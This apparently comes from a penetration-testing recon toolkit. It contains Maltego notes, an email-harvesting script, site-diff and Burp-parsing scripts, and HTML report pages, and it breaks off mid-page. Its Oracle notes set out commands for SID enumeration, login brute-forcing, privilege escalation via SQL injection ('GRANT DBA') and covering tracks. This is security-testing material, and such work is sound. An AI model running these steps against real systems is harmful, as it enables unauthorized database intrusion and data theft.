--------------------------------------------------------------------------------
 1 | Maltego
 2 | 
 3 | 
 4 | Use the scroll wheel to zoom in and out.
 5 | Hold down the right mouse button to move around.
 6 | ------------------------------------------------------------------------------------------------------
 7 | 
 8 | # Example 1
 9 | 
10 | Select Domain from the Entities palette on the left and drag the icon to the right.
11 | Edit the domain to your target.
12 | Right click > Run Transform > ...
13 | Email addresses from Domain > All
14 | 
15 | DNS from Domain > All
16 | ctrl + down to select servers > Resolve to IP > All
17 | ctrl + down to select IPs > DNS from IP > All
18 | ctrl + down to select servers > Convert to Domain > All
19 | ctrl + down to select domains > Email addresses from Domain > All
20 | Select all emails > Other transforms > To Person, emailToMyspaceAccount, emailToFlickerAccount
21 | ------------------------------------------------------------------------------------------------------
22 | 
23 | # Example 2
24 | 
25 | Select IPv4 Address from the Entities palette on the left and drag the icon to the right.
26 | Edit the IP address to your target.
27 | Right click > Run Transform > ...
28 | DNS from IP > All in this set
29 | ------------------------------------------------------------------------------------------------------
30 | 
31 | Add a Domain > edit name to your target (www.target.com)
32 | 
33 | # Example 3
34 | 
35 | Right click (RC) > Run Transform > All Transforms > To Domain [Find other TLDs]
36 | Select all TLDs > Run Transform > All Transforms > To Website [Quick lookup]
37 | 
38 | Select all websites > Run Transform > All Transforms > To IP Address [DNS]
39 | ------------------------------------------------------------------------------------------------------
40 | 
41 | # Example 4
42 | 
43 | RC > Run Transform > DNS from Domain > All in this set
44 | Select all  > Run Transform > All Transforms > To IP Address [DNS]
45 | Select all  IP addresses > Run Transform > All Transforms > To Netblock [Using whois info]
46 | 
47 | 


--------------------------------------------------------------------------------
/notes/oracle.txt:
--------------------------------------------------------------------------------
 1 | Oracle
 2 | 
 3 | 
 4 | 1. Locate a system running Oracle.
 5 | 2. Determine Oracle version.
 6 | 3. Determine Oracle SID.
 7 | 4. Guess/Bruteforce USERNAME/PASS.
 8 | 5. Privilege escalation via SQL injection.
 9 | 6. Manipulate data/post exploitation.
10 | 7. Cover tracks.
11 | ------------------------------------------------------------------------------------------------------
12 | 
13 | 1. nmap -Pn -n -T4 --open -p1521 <target IP>
14 | 
15 | 2. Example 1
16 |      msf > use auxiliary/scanner/oracle/tnslsnr_version
17 |      db_notes
18 |      
19 |    Example 2
20 |      tnscmd10g version -h <target IP>
21 |      tnscmd10g status -h <target IP>
22 |      Look for the version, LOGFILE, TRACING and PORT.
23 |    
24 | 3. Example 1
25 |      msf > use auxiliary/scanner/oracle/sid_enum
26 |      msf > use auxiliary/admin/oracle/sid_brute
27 |      
28 |    Example 2  
29 |      sidguess -i <target IP> -d /usr/share/metasploit-framework/data/wordlists/sid.txt
30 | 
31 |    Example 3
32 |      http://<target IP>:8080/oradb/PUBLIC/GLOBAL_NAME
33 | 
34 | 4. Example 1
35 |      msf > use auxiliary/admin/oracle/login_brute
36 |      set SID <sid>
37 |      
38 |    Example 2 
39 |      sqlplus <username>/<password>@<target IP>:<port>/<SID>
40 | 
41 | 5. msf > use auxiliary/admin/oracle/sql
42 |    set DBUSER <user>
43 |    set DBPASS <password>
44 |    set SID <sid>
45 |    set SQL select * from user_role_privs
46 |    
47 |    msf > use auxiliary/admin/oracle/pushin/lt_findricset_cursor
48 |    set DBUSER <user>
49 |    set DBPASS <password>
50 |    set SID <sid>
51 |    set SQL GRANT DBA TO <user>
52 |    set SQL GRANT JAVASYSPRIV TO <user>
53 |    
54 | 6. select * from v$version;                  -- Oracle version
55 |    select * from dba_registry_history;       -- Oracle patch level
56 |    select * from all_users;                  -- usernames
57 |    select owner,table_name from all_tables;  -- tables
58 |    select * from session_roles;              -- session roles
59 |    desc utl_http                             -- describes database objects
60 | 
61 | 
62 | http://www.youtube.com/watch?v=SVvAvmjT7V4#t=1535
63 | 
64 | 


--------------------------------------------------------------------------------
/mods/goog-mail.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import sys
 4 | import re
 5 | import string
 6 | import httplib
 7 | import urllib2
 8 | 
 9 | def StripTags(text):
10 |     finished = 0
11 |     while not finished:
12 |         finished = 1
13 |         start = text.find("<")
14 |         if start >= 0:
15 |             stop = text[start:].find(">")
16 |             if stop >= 0:
17 |                 text = text[:start] + text[start+stop+1:]
18 |                 finished = 0
19 |     return text
20 | if len(sys.argv) != 2:
21 |         print "\nExtracts emails from Google results.\n"
22 |         print "\nUsage: ./goog-mail.py <domain>\n"
23 |         sys.exit(1)
24 | 
25 | domain_name=sys.argv[1]
26 | d={}
27 | page_counter = 0
28 | try:
29 |     while page_counter < 50 :
30 |         results = 'http://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
31 |         request = urllib2.Request(results)
32 |         request.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
33 |         opener = urllib2.build_opener()                           
34 |         text = opener.open(request).read()
35 |         emails = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text)))
36 |         for email in emails:
37 |             d[email]=1
38 |             uniq_emails=d.keys()
39 |         page_counter = page_counter +10
40 | except IOError:
41 |     print "Cannot connect to Google Groups."+""
42 |     
43 | page_counter_web=0
44 | try:
45 |     while page_counter_web < 50 :
46 |         results_web = 'http://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N'
47 |         request_web = urllib2.Request(results_web)
48 |         request_web.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
49 |         opener_web = urllib2.build_opener()                           
50 |         text = opener_web.open(request_web).read()
51 |         emails_web = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text)))
52 |         for email_web in emails_web:
53 |             d[email_web]=1
54 |             uniq_emails_web=d.keys()
55 |         page_counter_web = page_counter_web +10
56 |         
57 | except IOError:
58 |     print "Cannot connect to Google Web."+""
59 | for uniq_emails_web in d.keys():
60 |     print uniq_emails_web+""
61 | 


--------------------------------------------------------------------------------
/misc/compare-sites.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | clear
  4 | 
  5 | break="=================================================="
  6 | DIR=/root/Desktop/compare-sites
  7 | DIFFONLY=false
  8 | 
  9 | usage(){
 10 | echo
 11 | echo
 12 | echo "Compare changes to home pages."
 13 | echo
 14 | echo
 15 | echo "Where file contains a list of URLs to be compared."
 16 | echo "Usage: $0 [options] file"
 17 | echo
 18 | echo "Options:"
 19 | echo " -c Compare versions."
 20 | echo " -o Output directory. Default: /root/Desktop/compare-sites"
 21 | echo
 22 | echo
 23 | }
 24 | 
 25 | ts2date(){
 26 | date -d "1970-01-01 $1 sec"
 27 | }
 28 | 
 29 | while getopts "o:c" OPTION; do
 30 |      case $OPTION in
 31 |           o) DIR="$OPTARG";;
 32 |           c) DIFFONLY=true;;
 33 |           *) echo && echo && exit;;
 34 |      esac
 35 | done
 36 | 
 37 | shift $(($OPTIND - 1))
 38 | FILE=$*
 39 | 
 40 | if [ -z $FILE ]; then
 41 |      usage
 42 |      exit
 43 | fi
 44 | 
 45 | if [ ! -f $FILE ]; then
 46 |      echo
 47 |      echo
 48 |      echo "File does not exist."
 49 |      echo
 50 |      echo
 51 |      exit
 52 | fi
 53 | 
 54 | if [ ! -d $DIR ]; then
 55 |      mkdir $DIR
 56 | fi
 57 | 
 58 | FILEHASH=${FILEHASH%%$FILE} # remove input file name from hash string (sha256sum)
 59 | HDIR="$DIR/$FILEHASH"
 60 | VERSION=1
 61 | 
 62 | while [ -f $HDIR/$VERSION ]; do
 63 |      VERSION=$(($VERSION + 1))
 64 | done
 65 | 
 66 | if ! $DIFFONLY; then
 67 |      date +%s > $HDIR/$VERSION
 68 |      echo
 69 |      echo
 70 |      echo "Downloading:"
 71 | 
 72 |      for URL in $(cat $FILE); do
 73 |           HASH=$(sha256sum <<<$URL | tr -d " -")
 74 |           echo "[*] $URL"
 75 |           wget -q $URL -O $HDIR/$URL-$HASH-$VERSION
 76 |      done
 77 | 
 78 |      echo
 79 |      echo $break
 80 | else
 81 |      VERSION=$(($VERSION - 1))
 82 | fi
 83 | 
 84 | if [ $VERSION -gt 1 ]; then
 85 |      echo
 86 |      echo "Versions:"
 87 | 
 88 |      for ((i=1; i<=${VERSION}; i++)); do
 89 |           echo $i - $(ts2date $(cat $HDIR/$i))
 90 |      done
 91 | 
 92 |      echo
 93 |      echo -n "Base version: "
 94 |      read A
 95 |      echo -n "Compare with: "
 96 |      read B
 97 | 
 98 |      [ -z $A ] && A="1";
 99 |      [ -z $B ] && B=$VERSION
100 | 
101 |      for URL in $(cat $FILE); do
102 |           echo
103 |           echo $break
104 |           echo
105 |           echo -e "\e[1;34m$URL\e[0m"
106 |           HASH=$(sha256sum <<<$URL | tr -d " -")
107 |           diff $HDIR/$URL-$HASH-$A $HDIR/$URL-$HASH-$B | grep '<iframe src='
108 |           # frames, window.location, window.href
109 |      done
110 | fi
111 | 
112 | 


--------------------------------------------------------------------------------
/parse-burp.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | # Copyright (C) 2013 www.pentestgeek.com Royce Davis (@r3dy__)
 3 | #
 4 | # This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as 
 5 | # published by the Free Software Foundation, either version 3 of the License, or any later version.
 6 | #
 7 | # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
 8 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 9 | #
10 | # You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>
11 | # Modded by Lee Baird
12 | 
13 | begin
14 |   require 'nokogiri'
15 |   require 'csv'
16 |   require 'optparse'
17 | rescue LoadError
18 |     puts 'Missing gems. Make sure to install: csv, nokogiri using \'gem install <gem>\''
19 |     exit
20 | end
21 | 
22 | # This is the main parsing method which will run on each finding in 'issue' (or finding) in the Burp XML file.
23 | def clean_finding(finding)
24 |   output = []
25 |   output << finding.css('host').text                   # URL
26 |   output << finding.css('path').text                   # Path
27 |   output << finding.css('name').text                   # Vulnerability
28 |   output << finding.css('issueBackground').text        # Description
29 |   output << finding.css('issueDetail').text            # Proof
30 |   output << finding.css('remediationBackground').text  # Solution
31 |   response = finding.css('response').text
32 |   output
33 | end
34 | 
35 | options = {}
36 | 
37 | optparse = OptionParser.new do|opts|
38 |     opts.banner = "Parse Burp Suite XML output into CSV results.\r\nUsage: #{$0} [options]"
39 | 
40 |     opts.on('-i', '--infile FILE', 'Input XML file') do |file|
41 |       raise 'No such file' unless File.exists?(file)
42 |       options[:infile] = file
43 |     end
44 | 
45 |     opts.on('-o', '--outfile FILE', 'Output CSV file') do |file|
46 |       options[:outfile] = file
47 |     end
48 | 
49 |     options[:help] = opts.help
50 | end
51 | 
52 | # Parse the arguments to the script
53 | optparse.parse!
54 | begin
55 |   raise OptionParser::MissingArgument if options[:infile].nil?
56 |   raise OptionParser::MissingArgument if options[:outfile].nil?
57 | rescue OptionParser::MissingArgument
58 |   puts options[:help]
59 |   exit
60 | end
61 | 
62 | # Create an XML object from the file provided at runtime
63 | report = Nokogiri::XML(File.open(options[:infile]))
64 | 
65 | # This is just a string that serves as the title line of the CSV output
66 | CSV.open(options[:outfile], 'w') do |csv|
67 |   csv << [
68 |     'URL',
69 |     'Path',
70 |     'Vulnerability',
71 |     'Description',
72 |     'Proof',
73 |     'Solution']
74 | 
75 |     report.xpath('//issues/issue').each do |finding|
76 |         csv << clean_finding(finding)
77 |     end
78 | end
79 | 
80 | 


--------------------------------------------------------------------------------
/report/pages/pdf.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li class="current"><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">PDF</small></h2>
80 | 			<iframe src="../data/pdf.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/doc.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li class="current"><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Word</small></h2>
80 | 			<iframe src="../data/doc.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/txt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li class="current"><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Text</small></h2>
80 | 			<iframe src="../data/txt.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/xls.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li class="current"><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Excel</small></h2>
80 | 			<iframe src="../data/xls.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/hosts.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li class="current"><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Hosts</small></h2>
80 | 			<iframe src="../data/hosts.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/ppt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
